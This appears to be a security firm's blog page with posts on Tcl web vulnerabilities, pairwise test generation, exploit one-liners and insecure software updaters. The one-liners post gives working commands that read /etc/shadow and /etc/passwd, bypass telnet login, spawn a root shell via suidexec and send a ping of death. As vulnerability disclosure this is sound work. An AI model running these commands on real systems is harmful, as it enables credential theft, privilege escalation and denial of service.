Posts Tagged vulnerabilities

Tickle! See? Gee, I …

A montage of TCL and Tcl-related logos


Ah, Tcl, the Tool Command Language. Based on research conducted by myself and my colleagues here at Security Objectives (most notably Shane Macaulay), we have concluded that Tcl has a multitude of security issues, especially when used in a network environment; and these days, network usage is almost unavoidable. In essence, we urge extreme caution in Tcl-based web development, whether Tcl is used directly or indirectly. More generally, we also advise against using Tcl for any network application or protocol (not just HTTP). Security Objectives has published an in-depth analysis of practical Tcl vulnerabilities. The whitepaper, entitled “Tickling CGI Problems”, outlines the theoretical backbone of the phenomena in its first half and presents cases of real-world exploitation in its second half. Familiarity with that background theory, along with some general programming and Hyper-Text Transfer Protocol knowledge, is recommended in order to gain a firm understanding of the exploits themselves.

This is not to say that Tcl should never be used; as a disclaimer, we are not advocating any programming language over another. Our position is that the traditional approach to web security with Tcl has much room for improvement. Like any other programming language, Tcl works nicely in certain areas such as academic research, scientific computing, extensions, and software testing. With that being said, one project that comes to mind is regfuzz, a quite useful regular expression fuzzer written in Tcl. The distinction here is that regfuzz is not intended to be exposed to a public (or even a private) network. Surely, Safe-Tcl could successfully serve network clients in a hardened production environment, given that assessed risks were rated low enough to be acceptable. The problem is that, as an overwhelming majority of cases shows, that is not how Tcl is deployed in practice.

The vulnerabilities exposed by the whitepaper affect TclHttpd, Lyris List Manager, cgi.tcl (which also uses Expect), as well as the Tcl language itself and interpreters thereof. Some of the attack methodologies and vulnerabilities identified are new to the public. Others are similar to well-known attacks or are simply subversions of previous security patches, e.g. CVE-2005-4147. As time unfolds, there will surely be a surge in publicized Tcl weaknesses due to the research elaborated on within the whitepaper. If you’re interested in discovering vulnerabilities in Tcl software yourself, there is a grand list of Tcl-related references available online. There is also a USENET newsgroup dedicated to the language, naturally called comp.lang.tcl.

For those of you attending CanSecWest 2011 in Vancouver, we are sponsoring the event. Professionals from Security Objectives will be in attendance to answer your queries regarding Tcl/Tk security or other areas of specialized research (information assurance, software assurance, cloud security, etc.) Of course, our professionals will also be available to field questions regarding Security Objectives’ product and service offerings as well. In addition, CanSecWest 2011 attendees receive special treatment when purchasing licenses for BlockWatch, the complete solution to total cloud security.


Jenny’s Got a Perfect Pair of..

binomial coefficients

..binomial coefficients?! That’s right. I’ve found the web site of a Mr. Bob Jenkins with an entire page dedicated to a pairwise covering array generator named jenny.c. I’m fairly sure that only the most hardcore of the software testing weenies have some notion of what those are, so for the sake of being succinct I’ll provide my own explanation here: a pairwise covering array generator is a program for silicon computing machines that deduces sequences of input value possibilities for the purposes of software testing. And yes, I did say silicon computers: since testing their software is really a question of the great Mr. Turing’s halting problem, the existence of a practical, affordable, and efficient nano/molecular computing device such as a DNA computer, Feynman machine, universal quantum computer, etc. would essentially predicate a swift solution to the problem of testing contemporary computer software in non-deterministic polynomial time. The only problem we would have then is how to test those fantastic, futuristic, seemingly science-fictive, yet wondrous problem-solving inventions as they break through laborious barriers of algorithmic complexity that twentieth-century computer scientists could have only dreamed about: PCP, #P, PSPACE-complete, 2-EXPTIME and beyond.. The stuff that dreams are made of.

Now, let’s return to Earth and learn about a few things that make Jenny so special. Computer scientists learned early in their studies of software testing that pairwise test cases, those exercising two input values in combination, were the most likely to uncover erroneous programming, or “bugs.” Forget the luxury of automation for a minute: old school programmers typed input pairs manually to test their own software. Code tested in that manner was most likely some sort of special-purpose console-mode utility. (Celsius to Fahrenheit, anyone?) As the computing power of the desktop PC increased according to Moore’s law, it became time-effective to write a simple program to generate these input pairs instead of toiling over them yourself; I suppose not testing at all was another option. Even today, some software is released to market after only very minor functional and/or quality assurance testing. Regression, stress, security, and other forms of testing cost money and reduce time to market, but in reality the significant return on investment acts as a hedge against any losses incurred. Even ephemeral losses justify the absolute necessity of these expenditures.
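The idea of pairwise coverage is easy to demonstrate. Below is a minimal Python sketch; the parameter names and values are hypothetical, and it only illustrates what it means for a test suite to cover every value pair, not how jenny.c actually constructs its arrays:

```python
from itertools import combinations, product

# Hypothetical configuration model: three parameters, two values each.
parameters = {
    "os": ["linux", "solaris"],
    "browser": ["firefox", "opera"],
    "proto": ["http", "https"],
}

def uncovered_pairs(test_cases, parameters):
    """Return the parameter-value pairs not exercised by any test case."""
    names = list(parameters)
    required = set()
    # Every pair of parameters, crossed with every pair of their values.
    for a, b in combinations(names, 2):
        for va, vb in product(parameters[a], parameters[b]):
            required.add(((a, va), (b, vb)))
    # Discard each pair that some test case exercises.
    for case in test_cases:
        for a, b in combinations(names, 2):
            required.discard(((a, case[a]), (b, case[b])))
    return required

# Exhaustive coverage needs 2 * 2 * 2 = 8 cases; these 4 cover all 12 pairs.
suite = [
    {"os": "linux",   "browser": "firefox", "proto": "http"},
    {"os": "linux",   "browser": "opera",   "proto": "https"},
    {"os": "solaris", "browser": "firefox", "proto": "https"},
    {"os": "solaris", "browser": "opera",   "proto": "http"},
]
print(len(uncovered_pairs(suite, parameters)))  # 0 -- every pair is covered
```

The gap between exhaustive and pairwise coverage widens dramatically as parameters and values are added, which is exactly why generators like Jenny earn their keep.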

A Jenny built in modern times undoubtedly has the power to deductively prove that a software product of the eighties is comprised of components (or units) that are fundamentally error-free. However, the paradox remains that improvements in automated software testers share a linear relationship with improvements in software in general. Thus, pairwise has become “n-way,” which describes the process of utilizing greater multiples of input values in order to cover acceptable numbers of test cases. The number of input combinations to be covered in this fashion grows exponentially and can be calculated as a binomial coefficient (see the formula below).

C(n, r) = n! / (r! (n − r)!)

(n choose r) in factorial terms
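To put numbers on that growth, here is a quick Python check of the formula above, assuming a hypothetical program with 20 input parameters:

```python
from math import factorial

# C(n, r) = n! / (r! * (n - r)!): the number of distinct r-way
# parameter combinations among n parameters.
def n_choose_r(n, r):
    return factorial(n) // (factorial(r) * factorial(n - r))

# Combinations an n-way covering array must address for 20 parameters:
for r in (2, 3, 6):
    print(r, n_choose_r(20, r))  # 2 -> 190, 3 -> 1140, 6 -> 38760
```

Going from pairwise to 6-way multiplies the combinations to cover roughly 200-fold, and each combination itself spans more values, hence the exponential blow-up in generated test cases.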

According to Paul Black, former SAMATE (Software Assurance Metrics And Tool Evaluation) project leader, researchers at NIST (notably Rick Kuhn and Dolores Wallace) have pegged 6-way as the magic number for optimal fault interaction coverage. This conclusion is based on hard evidence from studies of real-world software scenarios, including medical devices and the aerospace industry. However, it would not surprise me to see this approximation rise significantly in the coming decades, just as the paradoxical relationship between general-purpose software and automated software testing programs shifts in accordance with Moore’s law. If not by Moore, then by some other axiom of metric progression, such as Rogers’ bell curve of technological adoption.

I’ve also got a hunch that the tiny percentage of bugs in that “n is arbitrarily greater than 6” range are some of the most critical, powerfully impacting software vulnerabilities known to man. They lie on an attack surface that’s almost non-existent, which makes them by definition obscure, non-obvious, shadowy, and hidden. Vulnerabilities in this category are the most important by their very nature. Therefore, detecting vulnerabilities of this type will require people and tools that are masters of marksmanship and artistic in their innovation. Research in this area is just beginning in earnest, especially within the realms of dynamic instrumentation (binary steering), active analysis, fault propagation, higher-order preconditions/dependencies, concurrency issues, race conditions, etc. I believe that combining the merits inherent in various analysis techniques will lead to perfection in software testing.

For perfection in hashing, check out GNU’s gperf, read how Bob used a perfect hashing technique to augment Jenny’s n-tuples; then get ready for our Big ßeta release of the BlockWatch client software (just in time for the holiday season!)


Exploit One-Liners

Very Small Shell Scripts

Every once in a while there are security vulnerabilities publicized that can be exploited with a single command. This week, Security Objectives published advisories for two such vulnerabilities (SECOBJADV-2008-04 and SECOBJADV-2008-05) which I’ll be describing here. I’ll also be revisiting some one-line exploits from security’s past for nostalgia’s sake and because history tends to repeat itself.

Both of the issues discovered are related to Symantec’s Veritas Storage Foundation Suite, and they rely on the default set-uid root bits being set on the affected binaries. Before Symantec and Veritas combined, Sun’s package manager prompted the administrator with the option of removing the set-id bits. The new Symantec installer just went ahead and set the bits without asking (how rude!)

On to the good stuff.. The first weakness is an uninitialized memory disclosure vulnerability. It can be leveraged like so:

/opt/VRTS/bin/qiomkfile -s 65536 -h 4096 foo

Now, the contents of file .foo (note that it is a dot-file) will contain uninitialized memory from previous file system operations–usually from other users. Sensitive information can be harvested by varying the values to the -s and -h flags over a period of time.

This next one is a bit more critical in terms of privilege escalation. It is somewhat similar to the Solaris srsexec hole from last year. Basically, you can provide any file’s pathname on the command line and have it displayed on stderr. As part of the shell command, I’ve redirected standard error back to standard output.

/opt/VRTSvxfs/sbin/qioadmin -p /etc/shadow / 2>&1

Some of these one-liner exploits can be more useful than exploits that utilize shellcode. Kingcope’s Solaris in.telnetd exploit is a beautiful example of that. The really interesting thing about that one was its resurrection–it originally became well-known back in 1994. In 2007, Kingcope’s version won the Pwnie award for best server-side bug.

telnet -l -fusername hostname

Let’s not forget other timeless classics such as the cgi-bin/phf bug, also from the mid-nineties:

http://hostname/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
..and Debian’s suidexec hole from the late nineties:

/usr/bin/suidexec /bin/sh /path/to/script

I’m not including exploits that have pipes/semi-colons/backticks/etc. in the command-line because that’s really more than one command being executed. Since the “Ping of Death” is a single command from a commonly installed system utility I’ll be including it here as well. I consider it a true denial of service attack since it does not rely on bandwidth exhaustion:

ping -s70000 -c1 host



Updating the Updater

Professor John Frink Updates

Attacks against security components have been fairly common on server operating systems for decades; on PCs this wasn’t always necessary because of security models that resembled Swiss cheese. Since the beginning of the 21st century, Microsoft has been working diligently to close the obvious holes (for the most part). As a result, researchers have shifted their focus to the attack surface of security-centric code on PCs. Case in point: in the past several years we’ve seen loads of advisories released for vulnerabilities in anti-virus software. Read the Yankee Group’s “Fear and Loathing in Las Vegas: The Hackers Turn Pro” for a more in-depth analysis of this trend. One area in particular where I feel PC protection is lacking is automated software security update mechanisms; there is a lot of room for improvement.

According to Hewlett-Packard, Digital Equipment Corporation was the first in the industry to perform patch delivery, in 1983. Prior to this, updates were commonly delivered on tape by private courier. At one of 2600’s HOPE conferences, Kevin Mitnick spoke during the social engineering panel about an analog attack he had used to compromise this process. The gist of it was that he wore a UPS uniform (procured from a costume store) and delivered the “update” tape, with a login trojan on it, to his mark. Later, Mitnick became known for using SYN floods and TCP hijacking against Tsutomu Shimomura. Some sources even refer to this sort of digital man-in-the-middle as “The Mitnick Attack.”

Many software update components don’t use public key infrastructure to cryptographically verify the validity of the update server (e.g. SSL) or of the updated package (e.g. a digital signature). This is a problem. Impersonating the software update server is usually trivial: Wi-Fi access point impersonation, DNS cache poisoning, ARP spoofing, session hijacking, and compromising the legitimate update server are all possibilities.
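As a sketch of the package-verification half of the story, here is a minimal Python example. The manifest, package name, and digest are all hypothetical, and a hard-coded SHA-256 table stands in for what should really be an asymmetric digital signature, but it shows the essential check an updater must perform before installing anything:

```python
import hashlib

# Trusted digests must be obtained out of band (shipped with the installer
# or fetched over an authenticated channel), never over the same
# unauthenticated HTTP session as the package itself.
TRUSTED_MANIFEST = {
    # SHA-256 of the string "test", used here as a toy package payload.
    "update-1.2.pkg":
        "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08",
}

def verify_package(name, data):
    """Reject a package whose SHA-256 digest doesn't match the manifest."""
    expected = TRUSTED_MANIFEST.get(name)
    if expected is None:
        return False  # unknown package: refuse to install
    return hashlib.sha256(data).hexdigest() == expected

print(verify_package("update-1.2.pkg", b"test"))      # True: digest matches
print(verify_package("update-1.2.pkg", b"trojaned"))  # False: tampered payload
```

The crucial property is that the expected digest arrives over a channel that an attacker controlling the download cannot also tamper with; otherwise the check verifies nothing.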

Some applications–I’m not going to name any names–rely on HTTP (note that I didn’t say HTTPS) for downloading packages after checking for updates instead of using a separate file transfer manager program or internal update component. This is much easier to reverse engineer than a custom update solution. Sometimes the attacker can allow the real update server to carry out most of the process and simply shoehorn their malcode into the update session(s) after initial preconditions are met.

SSL won’t save the day either unless it’s implemented properly. I’ve seen plaintext updaters with digital signatures that are safer than some HTTPS updaters. Gentoo’s Portage Tree (emerge and ebuild) is a good example of an effective plaintext digital signature approach. See SECOBJADV-2008-01 (CVE-2008-3249) for a description of a software updater with an erroneous SSL implementation.

The issue is further complicated because software updaters themselves need to be updated in order to resolve such vulnerabilities, which typically requires a major architectural modification. What’s worse, breaking the updater would force users to update manually. Hoyvin-Glayvin!

